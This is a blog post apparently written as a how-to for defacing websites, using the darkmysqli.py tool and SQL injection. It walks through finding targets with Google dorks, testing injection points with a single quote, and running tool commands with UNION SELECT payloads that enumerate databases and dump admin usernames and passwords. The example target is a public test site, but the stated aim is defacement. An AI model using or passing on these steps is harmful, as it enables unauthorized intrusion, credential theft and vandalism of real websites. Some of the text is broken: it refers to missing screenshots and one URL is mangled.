Let us try to learn to deface websites with SQL injection using python software and darkmysqli.py. This time I will share some knowledge I gained from several underground forums. to deface the website by using darkmysqli.py, then we must have software python, because darkmysqli.py using python programming language.
python: python download and darkmysqli.py: darkmysqli.py downloadafter downloading install python and then extract darkmysqli.py in a folder.
To find the target we can use google dork, such as:
"inurl: artists.php? id =" (without quotes),
And we get a target: http://test.acunetix.com/artists.php?artist=1
Do not forget to add a single quote ( ') in the browser, to find weaknesses
Using darkmysqli16.py:
Find column using --findcol
exp: exp: darkmysqli16.py -u “http://test.acunetix.com/artists.php?artist=1″ –findcol
like this:
results obtained
http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de–
then we enter the commands that we can, search the database and table names with: "--full"
exp: darkmysqli16.py -u “http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de–” –full
once obtained the name of the database and under tabbel like this:
to find for a username and password are admin website with:
–dump -D (database name) -T (table name) -C (coloumn name)
exp: darkmysqli16.py -u http://test.acunetix.comartists.php?artist=1+AND+1=2+UNION+SELECT+1,darkc0de,3–” –dump -D acuart -T users -C uname, pass
like this:
and finally a we get the username and password that website.
from: my other blog
0 comments: on "Deface Website with darkmysqli.py"
Post a Comment